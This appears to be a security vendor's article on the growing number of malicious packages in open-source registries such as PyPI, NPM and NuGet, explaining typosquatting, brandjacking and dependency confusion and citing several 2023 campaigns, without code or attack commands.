Malicious software packages have always been a security concern, especially in corporate environments. Over the past year, there has been a large increase in the number of malware spread through open-source package platforms, while just in the first quarter of 2023, approximately 6,800 malicious packages were identified. Hundreds of thousands of users downloaded the malicious packages throughout the year.The top five malicious packages campaigns of the year alone led to 300,000 downloads and potential infections.
Python .py files now constitute 7% of the malicious files downloaded from the internet, compared to only 3% in our previous annual report. All of this happens via several common attack vectors like package name typosquatting, package brandjacking, and dependency confusion attacks. All of this emphasizes the importance of code legitimacy verification, especially for code written by unknown software developers.
During the software development process, programmers often use pre-existing packages that contain desirable functionality from code-sharing sources. This widespread practice has several advantages, including reducing the time required to write code and come up with solutions to complex problems. In most cases, pre-existing code performs efficiently and was already tested for bugs and edge cases. As a result, many open-source libraries and packages are available in every programming language.
The use of open-source libraries and packages raises several security concerns that can be exploited by threat actors. Due to the nature of open-source libraries, anyone can contribute and upload their code, making it difficult to track and verify shared code. A prime example is PyPI (Python Package Index), which is the main repository of software packages for the Python programming language. Despite recent attempts to mitigate these threats, PyPI heavily relies on user reports to ensure package security. Often, by the time they are reported and removed, the malicious packages may already have hundreds of downloads.
Most programmers do not check the integrity of open-source code before they add it to their own. It is challenging to understand the flow of code written by someone else, especially if it contains thousands of lines. In many cases, programmers are not aware of all possible security risks inherent in a piece of code, and even if they review it, they might miss malicious artifacts.
These malicious components can infect target networks, steal and exfiltrate sensitive information such as passwords and credit card information, and download additional malware components.
Creating a malicious open-source package is often straightforward and can have a significant impact. In this type of attack, the threat actor is not only targeting the developer who downloads the malicious package, but also the developer’s customers who use their trusted software and thus precipitating a software supply-chain attack.
Over the years, several prominent attack vectors for open-source software package platforms were developed by threat actors and proven feasible by security researchers. The most common one is typosquatting. In this type of attack, the threat actor publishes malicious packages with slightly misspelled names or variations of popular legitimate packages, in the hope that a user will unintentionally download the malicious version. Packages are typically installed using a command such as “package_manager_name install package_name”, for example, “npm install async”. Therefore, a small mistake in the package name can unknowingly result in the installation of a malicious package.
In June 2023, researchers uncovered a campaign containing over 160 malicious Python packages that had over 45,000 downloads. The threat actor uploaded Python packages resembling some of the most popular packages. Among them was a malicious package called “reaquests”, designed to mimic the Python package “requests” that is widely used for HTTP request operations by millions of users.
Not just Python libraries but all repositories that use open-source code sharing are targeted. The NuGet repository, an open-source package manager and software distribution system for .NET libraries, was used to launch a significant typosquatting campaign. The fraudulent packages were downloaded over 150,000 times in a single month before they were removed from the NuGet repository. The malicious packages contained a PowerShell script that was executed upon installation and triggered a download of a second-stage payload. The final payload was a custom crypto stealer called “Impala Stealer” which steals user credentials for cryptocurrency exchange platforms.
Cybercriminals don’t just exploit typos to deliver malicious packages. In package brandjacking, the threat actor creates malicious packages with the same names as the legitimate ones in the hopes of fooling users into downloading them.
In a recent attack against Mac computers, threat actors created a malicious version of the crypto library Cobo Custody Restful to deploy malware. The malicious version had the same name as the legitimate one and was stored in the PyPI registry. The threat actors took advantage of the fact that this package does not have an official distribution through the PyPI registry and is distributed only via GitHub. If the installation destination is not explicitly specified, the pip install manager prioritizes the malicious PyPI version over the legitimate GitHub version.
It’s not only package management platforms that are exploited. Threat actors try to subjugate existing legitimate accounts that host open-source code, such as GitHub, to add malicious code to legitimate packages. This method was demonstrated by researchers who took over a popular NPM package with more than 3.5 million weekly downloads by acquiring an expired domain name associated with one of the package maintainers. The recovered domain allowed them to reset the GitHub password, making it possible to publish Trojanized versions of the NPM packages.
In contrast with package brandjacking, dependency confusion attacks trick the package manager instead of the user. The threat actor exploits a vulnerability in the way that many package managers download dependencies during a software build process. The attacker publishes a package with the same name as a popular package on a public repository, whereas the original one is located in a private repository. This tricks the software installer script into pulling malicious code files. A research report from April 2023 states that 49% of all organizations are vulnerable to this attack vector.
Earlier this year, security researchers discovered that PyTorch, a widely-used machine-learning framework developed by Meta Platforms, had been compromised. The attack was initiated when a threat actor uploaded a malicious package to the PyPI repository with the same name and a higher version number than the legitimate package, causing dependency confusion. This attack affected thousands of machines and resulted in information theft.
Malicious open-source packages are used by both prolific threat actors and nation-sponsored actors. The following attack was attributed to the infamous North Korean group Lazarus. In August 2023, the group uploaded several malicious packages to the PyPI repository. They camouflaged one of the packages as a VMware vSphere connector module named “vConnector”. Another package mimicked “prettytable”, a popular Python tool for printing tables in an attractive ASCII format. The legitimate package “prettytable” has more than 9 million monthly downloads, while the malicious version “tablediter” received 736 downloads.
In addition, on Russian-language underground forums, Check Point researchers have observed the distribution of malware tailored for the PyPI registry. This allows attackers to launch malicious attacks easily, without prior warning.
The spread of malicious packages in open-source software repositories is a growing concern that requires heightened attention and proactive measures from both developers and users. While the benefits of open-source software are undeniable, the rising wave of attacks such as typosquatting, brandjacking, and dependency confusion reveals the limitations of these platforms. The ease of exploiting package management platforms like PyPi, NPM, and NuGet underscores the critical need for enhanced security protocols and thorough code review practices. Developers must prioritize security to protect end-users from the consequences of these malicious infiltrations.